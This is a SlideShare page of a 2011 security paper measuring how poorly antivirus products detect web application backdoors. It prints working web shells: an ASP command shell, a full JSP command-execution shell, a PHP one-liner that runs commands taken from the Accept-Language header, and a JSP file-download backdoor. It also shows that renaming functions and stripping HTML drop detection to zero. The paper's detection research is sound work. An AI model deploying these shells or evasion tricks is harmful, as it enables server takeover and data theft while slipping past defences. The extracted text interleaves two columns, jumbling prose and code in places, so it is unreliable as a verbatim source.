SlideShare une entreprise Scribd logo

Effectiveness of AV in Detecting Web Application Backdoors

n|u - The Open Security Community
n|u - The Open Security Community

Effectiveness of AV in Detecting Web Application Backdoors by Rahul Sasi @ null Mumbai Meet in January, 2011

Technologie
1  sur  8
Télécharger pour lire hors ligne
http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals” WEB APPLICATION SECURITY instead take a look at the very common web application Backdoors that are Effectiveness of Antivirus in commonly used by hackers and how Antivirus being used widely on many Web Detecting Web Application Servers is incapable of detecting them. Backdoors [FB1H2S aka Rahul Sasi] http://fb1h2s.com http://garage4hackers.com Abstract: This paper gives detailed idea of Diagram - 001 the effectiveness of Antivirus software’s in Normally an attack goes like Diagram 001, detecting various Web Application where attacker finds vulnerability in a hosted backdoors that widely affect Web Servers. web application and he manages to upload a The analysis would prove the inefficiency of malicious application backdoors in one of the current Antivirus techniques in detecting servers supported languages, like Asp, Php, Web application backdoors and its Asp.net, Jsp etc. And this gives him control over consequences. the entire Web Server. Firewalls and Antivirus softwares are always part of a network. Firewalls are mostly not asked to monitor web Introduction: Considering the increased traffic. So the only security measure the Web servers depend upon is the Antivirus. And we number of attacks on Web Applications and will go in detail analyzing common web defacement statistics on Web Servers, it’s application backdoors and how AVs lack in high time to review the security of Web catching them. Servers and protection mechanism aided to prevent them. Zone-H report at http://www.zone-h.org/news/id/4735 says that the defacements count gets doubled every year. They also add that the methodologies used to gain access are still the same “Application Layer Vulnerabilities”. Let’s not go into application vulnerabilities but
http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals” Antivirus Detection Mechanisms and Test # 1.1 Where They Lack Objective: Test on an old and popular backdoor which proves that popularity matters for detection Signature Based Detection Backdoor / File name: C99.php In this technique the Antivirus softwares need Description: A very old and widely used to have the signature of the Backdoor, and for backdoor having. Great numbers of options are that the companies should already have had a available. Born some 12 years ago. Signatures copy of the backdoor for analyzing. are available with most of the Antivirus Reasons behind ineffectiveness of “Signature software’s. Based” detection of Web Backdoors Analysis: Shows that 81% AVs detect the old 1) Signature based detection works fine man with self propagating worms as there File name: c99_locus7s.php mass spreading mechanism will some way make it to reach the AV companies Submission date: 2010-12-27 08:06:42 too. But that’s not the case with web Result: 34 /42 (81.0%) backdoors they don’t have any self spreading mechanism and as they are Test # 1.2 only targeted on a particular server and thus the most common Backdoors Objective: Prove that Signature based detection signature remains unknown is very easy to bypass when it comes to detect a web application backdoors as it’s based on 2) The signatures are not built based on strings. instructions like in PEs, but instead using strings and function calls. Simply Description: Web backdoor’s built-in scripting renaming a function call, string or languages are easy to bypass, the signatures are changing the order of the program can not build based on instructions like in PEs, but prove to be enough to bypass instead using strings and function calls. Simply “Signature Based Detection” approach renaming a function call or changing the order of the program would be enough to bypass AV. Note: Below given are some samples analyzed A second test was done by simply removing the for example purpose. All the samples analyzed Change logs (Authors name and update logs) were downloaded form a collection of common from the top of the script and a reanalysis web backdoors archive found on internet few showed that now only 27 AV detected it years back, Virus Total was used for the analysis.
http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals” File name: c99_locus7s.php File name: cmdasp.asp Submission date: 2011-01-25 12:17:19 Submission date: 2011-01-25 19:33:07 Result: 27 /43 (62.8%) Result: 35/ 43 (81.4%) Test #2.1 Test #3.2 Objective: Test on an old and not so popular Objective: Signature based detection on Web backdoor to prove that it’s really hard for web Application backdoors are easy to bypass application backdoors to reach AV vendor for Description: The above mentioned sample signature building which contained some HTML CODE (just for Description: Another sample was taken from formatting output) was edited in notepad and the same web backdoor collection pretty old the HTML contents were stripped off leaving but with less functionality, although enough to the actual backdoor code unhampered. Also deface a site functions were renamed and then backdoor was subjected to analysis Analysis: Shows that only 2 AV detects the backdoor. //html striped cmdasp.asp On Error Resume Next File name: AK-74 Security Team Web dim resp Shell Beta Version.php ' -- create the COM objects that we Submission date: 2011-01-25 17:33:25 will be using -- ' Result: 2/ 43 (4.7%) Set woot = Server.CreateObject("WSCRIPT.SHELL") Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") Test # 3.1 resp = woot.Run ("cmd.exe /c " dir, 0, True) Objective: Signature based detection of Web Response.Write Server.HTMLEncode(resp) Application backdoors are easy to bypass Description: A test on another old and popular Analysis: The analysis showed that striping of backdoor detected by all Av’s. And trying to useless plain HTML form the ASP code and make it undetectable by AVs. An Active Server renaming the function names made it Page’s simple command execute backdoor Undetectable by all the Avs while still providing named cmdasp.asp was obtained from a very full functionality old archive http://michaeldaw.org/projects/web-backdoor- File name: test2.asp compilation Submission date: 2011-01-25 19:57:03 Result: 0/ 43 (0.0%) Analysis: 81% of the AVs detected the script because of its popularity and availability of signature
http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals” Heuristics Based Detection For analyzing the above lets discuss on few common features of Web Application Not many Antivirus vendors depend upon backdoors. As such a Web backdoor would have heuristics for Web backdoor detection, only few some or all of the following features - prominent and leading Anti viruses employ this detection. 1) Execute System Commands On The Web Server Why heuristics based detection is not employed 2) Traverse Directories And View/Edit Files when it comes to Web Application And Programs 3) Upload Feature – Helpful In Local 1) Heuristics detection based on dynamic Privilege Escalation analysis and is always considered risky 4) Download Documents And File as the chances of false positives are 5) Registry Editing very high, and when it comes to Web 6) Execute A Reverse Connect, Bind Shell Application, risk is pretty high 7) Database Management 2) Web Application undergoes updates A Web backdoor with the first feature [Execute and changes frequently comparing PE commands] would itself be capable enough to files, and methodologies used for PE perform the rest of the features, in one way or detection could not be fully utilized other. So let’s further discuss on that. here Command execution is possible with almost all scripting languages if certain default functions 3) Executables could be added with a are not disabled on the environment depending legitimate sign in case of PEs but that’s upon the language. not possible with Web Scripts And except [1], [6] and [7] the rest all are 4) Static analysis on PE, based on few legitimate Web Application behaviors, so there critical and exceptional APIs could be is great possibility of getting detected. used for static heuristic detection. But Test # 4.1 in Web Application one flagging on such a function call would make a legitimate Objective: Testing simple command execution code black listed Backdoor in JSP, PHP using default system command execution functions and analyzing 5) Dynamic analysis at runtime is not used the efficiency of Antivirus in static heuristic on scripting languages as the codes are detection interpreted Command Execution shell in .Jsp that could be 6) Threat classification and Risk Analysis compiled to .war java web archive format. for Web Application is hard to automate
http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals” // cmd.jsp <%@ page import="java.util.*,java.io.*"%> <% %> <HTML><BODY> Commands with JSP <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="cmd"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "<BR>"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> </pre> </BODY></HTML> Analysis: No Antivirus detected it File name: cmd.jsp Submission date: 2011-01-25 21:32:32 (UTC) Result: 0/ 43 (0.0%)
http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals” Test # 4.2 a runtime analysis is performed. And hence lack of detection is observed. Objective: Command Execution shell in PHP which could be added to an already existing Code: Download File from server PHP file and could process request via User- // Download_file.jsp by fb1h2s Agent header <%@ page import="java.util.*,java.io.*"%><% File f = new File <?php (request.getParameter("d")); passthru(getenv("HTTP_ACCEPT_LANGUAGE")) response.setContentType ("application/ear");response.setHeader ; echo '<br> Fb1h2s'; ?> ("Content-Disposition", "attachment; filename="fb1h2s.bak""); InputStream in = new Analysis: No Antivirus detected it FileInputStream(f);ServletOutputStream outs = response.getOutputStream();int bit = 2555555;int i = 0;while ((bit) >= File name: accept_lanaguage.php 0){bit = Submission date: 2011-01-25 21:36:20 in.read();outs.write(bit);}outs.flush() (UTC) ;outs.close();in.close();%> Result: 0/ 43 (0.0%) The above analysis shows that even though the getRuntime().exec and passthu() functions were Analysis: No antivirus scanners detected it present in the code the static analysis of the [Static and heuristics scan] in efficiency of AVs were not able to detect those critical detecting web backdoors at runtime. The above function calls. program is a threat, and these kinds of Threat classification and Risk Analysis for Web backdoors are hard to detect by automated Application is hard to automate. It’s hard to AVs, unless there is a policy created for files and detect which piece of code is legitimate and folders regarding accessibility which one is not. Consider the following tests File name: download_jsp.war Test #4.3 Submission date: 2011-01-26 3:36:20 Result: 0/ 43 (0.0%) Objective: Classifying a threat. Run time analysis is not possible on Web Backdoors Description: Below given is a simple program in JSP that could download files from the server. Downloading a file from web server is a legitimate activity and cannot be used as a reason for heuristic detection. But what if the program tries to download a configuration file, or other critical files from the server. These kinds of backdoors could not be detected unless
http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals” d96e8606c79b0e76b6a2ce040395e775cb4da86- 1294670298 Conclusion: Web applications and environments hosting is growing rapidly and the necessity of providing improved security increases. The in efficiency of Test #3.2 current Antivirus software’s in detecting Web Application backdoors is proved to be http://www.virustotal.com/file- inadequate. These factors add up to need of scan/report.html?id=1b686ac4c7ffca2e546e3c82d0 b9012109f74d72f957615395b043923b83054e- Antivirus vendors become apprised of Web 1295374370 Back Door and improved specialized detection techniques. And also advises Web Server Test # 4.1 administrators not to fully depend on native http://www.virustotal.com/file- AV/Firewalls for preventing Web intrusions. scan/report.html?id=6c4ccd3589f1d64843e884382 There are a handful of good Web Applications b448f03d1277317524fa45e06d519b4b9ed5dc0- specific firewalls out in market, which could 1295991152 yield a satisfactory result. Test #4.2 References and Appendix: http://www.virustotal.com/file- Test # 1.1 scan/report.html?id=f1460fb9e543fb5d1ccc7eadad 05233a51fedb146c316017c31bf1856fd8f2a5- http://www.virustotal.com/file- 1295949577 scan/report.html?id=63d02e75b729e2cc17604235c f9c0b506b3ca5d578a8e32a0e85e28763ca25a6- Test #4.3 1293437202 http://www.virustotal.com/file- Test #1.2 scan/report.html?id=092e2e97b33119a97441c2419 4c49bf75d3cec7371c42fb1f94e2ecaeb78d8c9- http://www.virustotal.com/file- 1295936735 scan/report.html?id=07623faf67eae7706dbe43bf45 f383a1c19b6ab81dbc941ea7e47030412c7166- An archive of Codes and analyses could be 1295957839 found from here: Test #2.1 http://www.garage4hackers.com/showthread.p http://www.virustotal.com/file- hp?723-Effectiveness-of-Antivirus-in-Detecting- scan/report.html?id=dc91561fd0b7a555e9e1a26fd Web-Application-Backdoors d189d18832b9d896f50e7f8afa153773d1a851c- 1295976805 Test #3.1 http://www.virustotal.com/file- scan/report.html?id=101bf8dcdd414f09ba46cdecb
http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals”

Recommandé

Null Mumbai Meet_Android Reverse Engineering by Samrat Das
Null Mumbai Meet_Android Reverse Engineering by Samrat DasNull Mumbai Meet_Android Reverse Engineering by Samrat Das
Null Mumbai Meet_Android Reverse Engineering by Samrat Dasnullowaspmumbai
 
Fuzzing | Null OWASP Mumbai | 2016 June
Fuzzing | Null OWASP Mumbai | 2016 JuneFuzzing | Null OWASP Mumbai | 2016 June
Fuzzing | Null OWASP Mumbai | 2016 Junenullowaspmumbai
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug BountiesOWASP Nagpur
 
Drozer - An Android Application Security Tool
Drozer - An Android Application Security Tool Drozer - An Android Application Security Tool
Drozer - An Android Application Security Tool nullowaspmumbai
 
Freeware Security Tools You Need
Freeware Security Tools You NeedFreeware Security Tools You Need
Freeware Security Tools You Needamiable_indian
 
DEFCON 21: EDS: Exploitation Detection System WP
DEFCON 21: EDS: Exploitation Detection System WPDEFCON 21: EDS: Exploitation Detection System WP
DEFCON 21: EDS: Exploitation Detection System WPAmr Thabet
 
Android Application Security
Android Application SecurityAndroid Application Security
Android Application SecurityChong-Kuan Chen
 
DEFCON 21: EDS: Exploitation Detection System Slides
DEFCON 21: EDS: Exploitation Detection System SlidesDEFCON 21: EDS: Exploitation Detection System Slides
DEFCON 21: EDS: Exploitation Detection System SlidesAmr Thabet
 

Recommandé

Null Mumbai Meet_Android Reverse Engineering by Samrat Das
Null Mumbai Meet_Android Reverse Engineering by Samrat DasNull Mumbai Meet_Android Reverse Engineering by Samrat Das
Null Mumbai Meet_Android Reverse Engineering by Samrat Dasnullowaspmumbai
 
Fuzzing | Null OWASP Mumbai | 2016 June
Fuzzing | Null OWASP Mumbai | 2016 JuneFuzzing | Null OWASP Mumbai | 2016 June
Fuzzing | Null OWASP Mumbai | 2016 Junenullowaspmumbai
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug BountiesOWASP Nagpur
 
Drozer - An Android Application Security Tool
Drozer - An Android Application Security Tool Drozer - An Android Application Security Tool
Drozer - An Android Application Security Tool nullowaspmumbai
 
Freeware Security Tools You Need
Freeware Security Tools You NeedFreeware Security Tools You Need
Freeware Security Tools You Needamiable_indian
 
DEFCON 21: EDS: Exploitation Detection System WP
DEFCON 21: EDS: Exploitation Detection System WPDEFCON 21: EDS: Exploitation Detection System WP
DEFCON 21: EDS: Exploitation Detection System WPAmr Thabet
 
Android Application Security
Android Application SecurityAndroid Application Security
Android Application SecurityChong-Kuan Chen
 
DEFCON 21: EDS: Exploitation Detection System Slides
DEFCON 21: EDS: Exploitation Detection System SlidesDEFCON 21: EDS: Exploitation Detection System Slides
DEFCON 21: EDS: Exploitation Detection System SlidesAmr Thabet
 
NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin Magazine
NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin MagazineNIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin Magazine
NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin MagazineAditya K Sood
 
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSEWEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSEAjith Kp
 
Secure coding-guidelines
Secure coding-guidelinesSecure coding-guidelines
Secure coding-guidelinesTrupti Shiralkar, CISSP
 
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSEWEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSEAjith Kp
 
Better Security Testing: Using the Cloud and Continuous Delivery
Better Security Testing: Using the Cloud and Continuous DeliveryBetter Security Testing: Using the Cloud and Continuous Delivery
Better Security Testing: Using the Cloud and Continuous DeliveryGene Gotimer
 
Application Virtualization
Application VirtualizationApplication Virtualization
Application Virtualizationsecurityxploded
 
Cq3210191021
Cq3210191021Cq3210191021
Cq3210191021IJMER
 
The Dark Side of PowerShell by George Dobrea
The Dark Side of PowerShell by George DobreaThe Dark Side of PowerShell by George Dobrea
The Dark Side of PowerShell by George DobreaEC-Council
 
Spring Roo Rev005
Spring Roo Rev005Spring Roo Rev005
Spring Roo Rev005Rich Helton
 
Securing Apache Web Servers
Securing Apache Web ServersSecuring Apache Web Servers
Securing Apache Web ServersInformation Technology
 
Pentesting With Web Services in 2012
Pentesting With Web Services in 2012Pentesting With Web Services in 2012
Pentesting With Web Services in 2012Ishan Girdhar
 
System Event Monitoring for Active Authentication
System Event Monitoring for Active AuthenticationSystem Event Monitoring for Active Authentication
System Event Monitoring for Active AuthenticationCoveros, Inc.
 
Advanced System Security and Digital Forensics
Advanced System Security and Digital ForensicsAdvanced System Security and Digital Forensics
Advanced System Security and Digital ForensicsDr. Ramchandra Mangrulkar
 
Malware collection and analysis
Malware collection and analysisMalware collection and analysis
Malware collection and analysisChong-Kuan Chen
 
Kali linux useful tools
Kali linux useful toolsKali linux useful tools
Kali linux useful toolsmilad mahdavi
 
Continuous Integration: Live Static Analysis with Puma Scan
Continuous Integration: Live Static Analysis with Puma ScanContinuous Integration: Live Static Analysis with Puma Scan
Continuous Integration: Live Static Analysis with Puma ScanCypress Data Defense
 
Mobile application security
Mobile application securityMobile application security
Mobile application securityShubhneet Goel
 
First Steps in Android
First Steps in AndroidFirst Steps in Android
First Steps in AndroidRich Helton
 
ENPM808 Independent Study Final Report - amaster 2019
ENPM808 Independent Study Final Report - amaster 2019ENPM808 Independent Study Final Report - amaster 2019
ENPM808 Independent Study Final Report - amaster 2019Alexander Master
 
Android secure offline storage - CC Mobile
Android secure offline storage - CC MobileAndroid secure offline storage - CC Mobile
Android secure offline storage - CC MobileSteve De Zitter
 
VAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxVAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxkarthikvcyber
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxDARSHANBHAVSAR14
 

Contenu connexe

Tendances

NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin Magazine
NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin MagazineNIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin Magazine
NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin MagazineAditya K Sood
 
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSEWEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSEAjith Kp
 
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSEWEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSEAjith Kp
 
Better Security Testing: Using the Cloud and Continuous Delivery
Better Security Testing: Using the Cloud and Continuous DeliveryBetter Security Testing: Using the Cloud and Continuous Delivery
Better Security Testing: Using the Cloud and Continuous DeliveryGene Gotimer
 
Application Virtualization
Application VirtualizationApplication Virtualization
Application Virtualizationsecurityxploded
 
Cq3210191021
Cq3210191021Cq3210191021
Cq3210191021IJMER
 
The Dark Side of PowerShell by George Dobrea
The Dark Side of PowerShell by George DobreaThe Dark Side of PowerShell by George Dobrea
The Dark Side of PowerShell by George DobreaEC-Council
 
Spring Roo Rev005
Spring Roo Rev005Spring Roo Rev005
Spring Roo Rev005Rich Helton
 
Pentesting With Web Services in 2012
Pentesting With Web Services in 2012Pentesting With Web Services in 2012
Pentesting With Web Services in 2012Ishan Girdhar
 
System Event Monitoring for Active Authentication
System Event Monitoring for Active AuthenticationSystem Event Monitoring for Active Authentication
System Event Monitoring for Active AuthenticationCoveros, Inc.
 
Advanced System Security and Digital Forensics
Advanced System Security and Digital ForensicsAdvanced System Security and Digital Forensics
Advanced System Security and Digital ForensicsDr. Ramchandra Mangrulkar
 
Malware collection and analysis
Malware collection and analysisMalware collection and analysis
Malware collection and analysisChong-Kuan Chen
 
Kali linux useful tools
Kali linux useful toolsKali linux useful tools
Kali linux useful toolsmilad mahdavi
 
Continuous Integration: Live Static Analysis with Puma Scan
Continuous Integration: Live Static Analysis with Puma ScanContinuous Integration: Live Static Analysis with Puma Scan
Continuous Integration: Live Static Analysis with Puma ScanCypress Data Defense
 
Mobile application security
Mobile application securityMobile application security
Mobile application securityShubhneet Goel
 
First Steps in Android
First Steps in AndroidFirst Steps in Android
First Steps in AndroidRich Helton
 
ENPM808 Independent Study Final Report - amaster 2019
ENPM808 Independent Study Final Report - amaster 2019ENPM808 Independent Study Final Report - amaster 2019
ENPM808 Independent Study Final Report - amaster 2019Alexander Master
 
Android secure offline storage - CC Mobile
Android secure offline storage - CC MobileAndroid secure offline storage - CC Mobile
Android secure offline storage - CC MobileSteve De Zitter
 

Tendances (20)

NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin Magazine
NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin MagazineNIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin Magazine
NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin Magazine
 
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSEWEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
 
Secure coding-guidelines
Secure coding-guidelinesSecure coding-guidelines
Secure coding-guidelines
 
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSEWEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
 
Better Security Testing: Using the Cloud and Continuous Delivery
Better Security Testing: Using the Cloud and Continuous DeliveryBetter Security Testing: Using the Cloud and Continuous Delivery
Better Security Testing: Using the Cloud and Continuous Delivery
 
Application Virtualization
Application VirtualizationApplication Virtualization
Application Virtualization
 
Cq3210191021
Cq3210191021Cq3210191021
Cq3210191021
 
The Dark Side of PowerShell by George Dobrea
The Dark Side of PowerShell by George DobreaThe Dark Side of PowerShell by George Dobrea
The Dark Side of PowerShell by George Dobrea
 
Spring Roo Rev005
Spring Roo Rev005Spring Roo Rev005
Spring Roo Rev005
 
Securing Apache Web Servers
Securing Apache Web ServersSecuring Apache Web Servers
Securing Apache Web Servers
 
Pentesting With Web Services in 2012
Pentesting With Web Services in 2012Pentesting With Web Services in 2012
Pentesting With Web Services in 2012
 
System Event Monitoring for Active Authentication
System Event Monitoring for Active AuthenticationSystem Event Monitoring for Active Authentication
System Event Monitoring for Active Authentication
 
Advanced System Security and Digital Forensics
Advanced System Security and Digital ForensicsAdvanced System Security and Digital Forensics
Advanced System Security and Digital Forensics
 
Malware collection and analysis
Malware collection and analysisMalware collection and analysis
Malware collection and analysis
 
Kali linux useful tools
Kali linux useful toolsKali linux useful tools
Kali linux useful tools
 
Continuous Integration: Live Static Analysis with Puma Scan
Continuous Integration: Live Static Analysis with Puma ScanContinuous Integration: Live Static Analysis with Puma Scan
Continuous Integration: Live Static Analysis with Puma Scan
 
Mobile application security
Mobile application securityMobile application security
Mobile application security
 
First Steps in Android
First Steps in AndroidFirst Steps in Android
First Steps in Android
 
ENPM808 Independent Study Final Report - amaster 2019
ENPM808 Independent Study Final Report - amaster 2019ENPM808 Independent Study Final Report - amaster 2019
ENPM808 Independent Study Final Report - amaster 2019
 
Android secure offline storage - CC Mobile
Android secure offline storage - CC MobileAndroid secure offline storage - CC Mobile
Android secure offline storage - CC Mobile
 

Similaire à Effectiveness of AV in Detecting Web Application Backdoors

VAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxVAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxkarthikvcyber
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxDARSHANBHAVSAR14
 
Top 10 Web Vulnerability Scanners
Top 10 Web Vulnerability ScannersTop 10 Web Vulnerability Scanners
Top 10 Web Vulnerability Scannerswensheng wei
 
Stuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learnedStuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learnedYury Chemerkin
 
website vulnerability scanner and reporter research paper
website vulnerability scanner and reporter research paperwebsite vulnerability scanner and reporter research paper
website vulnerability scanner and reporter research paperBhagyashri Chalakh
 
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...Felipe Prado
 
Black hat 2010-bannedit-advanced-command-injection-exploitation-1-wp
Black hat 2010-bannedit-advanced-command-injection-exploitation-1-wpBlack hat 2010-bannedit-advanced-command-injection-exploitation-1-wp
Black hat 2010-bannedit-advanced-command-injection-exploitation-1-wprgster
 
Web application vulnerability assessment
Web application vulnerability assessmentWeb application vulnerability assessment
Web application vulnerability assessmentRavikumar Paghdal
 
Simseer and Bugwise - Web Services for Binary-level Software Similarity and D...
Simseer and Bugwise - Web Services for Binary-level Software Similarity and D...Simseer and Bugwise - Web Services for Binary-level Software Similarity and D...
Simseer and Bugwise - Web Services for Binary-level Software Similarity and D...Silvio Cesare
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingRana Khalil
 
Webscarab demo @ OWASP Belgium
Webscarab demo @ OWASP BelgiumWebscarab demo @ OWASP Belgium
Webscarab demo @ OWASP BelgiumPhilippe Bogaerts
 
Operations: Production Readiness Review – How to stop bad things from Happening
Operations: Production Readiness Review – How to stop bad things from HappeningOperations: Production Readiness Review – How to stop bad things from Happening
Operations: Production Readiness Review – How to stop bad things from HappeningAmazon Web Services
 
Software Composition Analysis Deep Dive
Software Composition Analysis Deep DiveSoftware Composition Analysis Deep Dive
Software Composition Analysis Deep DiveUlisses Albuquerque
 
Web application penetration testing lab setup guide
Web application penetration testing lab setup guideWeb application penetration testing lab setup guide
Web application penetration testing lab setup guideSudhanshu Chauhan
 

Similaire à Effectiveness of AV in Detecting Web Application Backdoors (20)

VAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxVAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptx
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptx
 
Attacking antivirus
Attacking antivirusAttacking antivirus
Attacking antivirus
 
Cyber ppt
Cyber pptCyber ppt
Cyber ppt
 
Top 10 Web Vulnerability Scanners
Top 10 Web Vulnerability ScannersTop 10 Web Vulnerability Scanners
Top 10 Web Vulnerability Scanners
 
Stuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learnedStuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learned
 
website vulnerability scanner and reporter research paper
website vulnerability scanner and reporter research paperwebsite vulnerability scanner and reporter research paper
website vulnerability scanner and reporter research paper
 
Web Security
Web SecurityWeb Security
Web Security
 
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
 
Black hat 2010-bannedit-advanced-command-injection-exploitation-1-wp
Black hat 2010-bannedit-advanced-command-injection-exploitation-1-wpBlack hat 2010-bannedit-advanced-command-injection-exploitation-1-wp
Black hat 2010-bannedit-advanced-command-injection-exploitation-1-wp
 
Web application vulnerability assessment
Web application vulnerability assessmentWeb application vulnerability assessment
Web application vulnerability assessment
 
Simseer and Bugwise - Web Services for Binary-level Software Similarity and D...
Simseer and Bugwise - Web Services for Binary-level Software Similarity and D...Simseer and Bugwise - Web Services for Binary-level Software Similarity and D...
Simseer and Bugwise - Web Services for Binary-level Software Similarity and D...
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration Testing
 
Web backdoors attacks, evasion, detection
Web backdoors attacks, evasion, detectionWeb backdoors attacks, evasion, detection
Web backdoors attacks, evasion, detection
 
Webscarab demo @ OWASP Belgium
Webscarab demo @ OWASP BelgiumWebscarab demo @ OWASP Belgium
Webscarab demo @ OWASP Belgium
 
Operations: Production Readiness Review – How to stop bad things from Happening
Operations: Production Readiness Review – How to stop bad things from HappeningOperations: Production Readiness Review – How to stop bad things from Happening
Operations: Production Readiness Review – How to stop bad things from Happening
 
Node.js security tour
Node.js security tourNode.js security tour
Node.js security tour
 
Software Composition Analysis Deep Dive
Software Composition Analysis Deep DiveSoftware Composition Analysis Deep Dive
Software Composition Analysis Deep Dive
 
Web application penetration testing lab setup guide
Web application penetration testing lab setup guideWeb application penetration testing lab setup guide
Web application penetration testing lab setup guide
 
Web Hacking
Web HackingWeb Hacking
Web Hacking
 

Plus de n|u - The Open Security Community

Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...n|u - The Open Security Community
 

Plus de n|u - The Open Security Community (20)

Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)
 
Osint primer
Osint primerOsint primer
Osint primer
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
 
Metasploit primary
Metasploit primaryMetasploit primary
Metasploit primary
 
Api security-testing
Api security-testingApi security-testing
Api security-testing
 
Introduction to TLS 1.3
